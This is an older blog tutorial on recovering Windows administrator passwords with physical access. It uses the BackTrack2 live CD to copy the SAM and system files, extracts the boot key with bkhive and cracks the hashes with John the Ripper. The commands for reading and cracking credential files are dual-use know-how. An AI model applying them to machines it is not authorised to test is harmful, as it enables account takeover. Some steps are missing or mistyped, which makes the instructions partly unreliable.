Backtrack2 Homepage: http://www.remote-exploit.org/backtrack.html
Written by : Me (pavs)
Inspired By : http://www.neophob.com/serendipity/index.php?/archives/89-Crack-local-Windows-passwords-with-Backtrack-v1.x.html
One of several ways to gain Admin passwords in a windows system, if you have physical access to the system is by using a boot live linux distro like Backtrack2. Backtrack is a pen-testing distro so obviously it is loaded with all kinds of software to help you do security tests in both local and remote systems.
Assuming that the local allows you to boot from the CD and the bios is not password protected. Which also has ways to go around but I won’t discuss those in this tutorial.
The first thing to do after booting in to BT (Backtrack), is to open a shell window.
Our first job is to mount the disk/partition where the windows installation that we are trying to crack is located. With this command : # cd /mnt/hda2/WINDOWS/system32/config
# cp SAM /tmp
# cp system /tmp
We will decrypt the SAM file to get the password hashes and route it to the tmp folder with this command: bkhive system key > /tmp/key
Now we extract the password hashes out of the SAM file and dump it in a text file in a “crack-readable” format.
This is how the hashes looks like, obviously some informations are blurred out.
Now we will use John the Ripper password cracker in brute force mode to crack this password. John is not the only program to crack SAM hashes there are other ways and other programs that does the same. The tutorial just demonstrates one of the several ways of doing it.
In Blacktrack2 it’s located here:
Or on the shell you can type this: cd /pentest/password/join-1.7.2/run
This is the process of John cracking the password, with the command:
john –incremental:all -f=NT /tmp/hashes.txt
This process might take very long depending on your processor speed and password complexity and length.
Thats all for now.
pavsHacking Software Review